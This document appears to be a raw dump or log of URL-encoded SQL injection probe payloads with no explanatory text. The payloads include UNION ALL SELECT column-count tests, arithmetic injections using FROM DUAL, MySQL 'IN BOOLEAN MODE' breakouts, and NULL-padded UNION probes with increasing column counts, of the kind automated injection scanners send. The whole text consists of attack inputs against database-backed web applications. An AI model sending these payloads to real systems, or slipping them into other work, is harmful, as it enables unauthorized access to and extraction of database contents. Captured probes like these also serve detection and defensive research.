-7144%20%2B%20%28SELECT%201049%20WHERE%206700%3D6700%20UNION%20ALL%20SELECT%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700--%20%20%29 -6800%20%2B%20%28SELECT%208546%20WHERE%208607%3D8607%20UNION%20ALL%20SELECT%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607--%20%20%29 -9235%27%20%2B%20%28SELECT%20%27LYgP%27%20FROM%20DUAL%20WHERE%203736%3D3736%20UNION%20ALL%20SELECT%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736%2C%203736--%20%20%29%20%2B%20%27 -5900%27%20%2B%20%28SELECT%20%27ihbO%27%20FROM%20DUAL%20WHERE%203392%3D3392%20UNION%20ALL%20SELECT%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392%2C%203392--%20%20%29%20%2B%20%27 -3468%27%20%2B%20%28SELECT%20%27gbLx%27%20FROM%20DUAL%20WHERE%203373%3D3373%20UNION%20ALL%20SELECT%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373--%20%20%29%20%2B%20%27 -2506%27%20%2B%20%28SELECT%20%27KGDf%27%20FROM%20DUAL%20WHERE%201032%3D1032%20UNION%20ALL%20SELECT%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032--%20%20%29%20%2B%20%27 -7364%27%20%2B%20%28SELECT%20%27dbQq%27%20FROM%20DUAL%20WHERE%203380%3D3380%20UNION%20ALL%20SELECT%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380%2C%203380--%20%20%29%20%2B%20%27 -7554%27%20%2B%20%28SELECT%20%27fezU%27%20FROM%20DUAL%20WHERE%203635%3D3635%20UNION%20ALL%20SELECT%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635--%20%20%29%20%2B%20%27 -9177%27%20%2B%20%28SELECT%20%27AzIc%27%20FROM%20DUAL%20WHERE%207854%3D7854%20UNION%20ALL%20SELECT%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854%2C%207854--%20%20%29%20%2B%20%27 -8893%27%20%2B%20%28SELECT%20%27XzdH%27%20FROM%20DUAL%20WHERE%203824%3D3824%20UNION%20ALL%20SELECT%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824%2C%203824--%20%20%29%20%2B%20%27 -7944%27%20%2B%20%28SELECT%20%27EYJw%27%20FROM%20DUAL%20WHERE%206390%3D6390%20UNION%20ALL%20SELECT%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390--%20%20%29%20%2B%20%27 -3148%27%20%2B%20%28SELECT%20%27hYkX%27%20FROM%20DUAL%20WHERE%204654%3D4654%20UNION%20ALL%20SELECT%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654--%20%20%29%20%2B%20%27 -4021%27%20%2B%20%28SELECT%20%27WrcC%27%20WHERE%201904%3D1904%20UNION%20ALL%20SELECT%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904--%20%20%29%20%2B%20%27 -9078%27%20%2B%20%28SELECT%20%27afya%27%20WHERE%202881%3D2881%20UNION%20ALL%20SELECT%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881--%20%20%29%20%2B%20%27 -7546%27%20%2B%20%28SELECT%20%27hXlW%27%20WHERE%208081%3D8081%20UNION%20ALL%20SELECT%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081--%20%20%29%20%2B%20%27 -2379%27%20%2B%20%28SELECT%20%27KodB%27%20WHERE%205202%3D5202%20UNION%20ALL%20SELECT%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202--%20%20%29%20%2B%20%27 -7802%27%20%2B%20%28SELECT%20%27ssxm%27%20WHERE%205830%3D5830%20UNION%20ALL%20SELECT%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830%2C%205830--%20%20%29%20%2B%20%27 -8073%27%20%2B%20%28SELECT%20%27sjJA%27%20WHERE%205628%3D5628%20UNION%20ALL%20SELECT%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628--%20%20%29%20%2B%20%27 -1665%27%20%2B%20%28SELECT%20%27hHbm%27%20WHERE%202913%3D2913%20UNION%20ALL%20SELECT%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913--%20%20%29%20%2B%20%27 -1028%27%20%2B%20%28SELECT%20%27jYAh%27%20WHERE%201889%3D1889%20UNION%20ALL%20SELECT%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889%2C%201889--%20%20%29%20%2B%20%27 -9484%27%20%2B%20%28SELECT%20%27wMET%27%20WHERE%204376%3D4376%20UNION%20ALL%20SELECT%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376--%20%20%29%20%2B%20%27 -9698%27%20%2B%20%28SELECT%20%27DVuS%27%20WHERE%206670%3D6670%20UNION%20ALL%20SELECT%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670--%20%20%29%20%2B%20%27 -9073%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881--%20%20%23 -1514%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418%2C%207418--%20%20%23 -8501%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961--%20%20%23 -4996%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786--%20%20%23 -3675%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839--%20%20%23 -1667%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600%2C%202600--%20%20%23 -3859%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621--%20%20%23 -2899%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243%2C%208243--%20%20%23 -2302%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285--%20%20%23 -2985%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805%2C%206805--%20%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 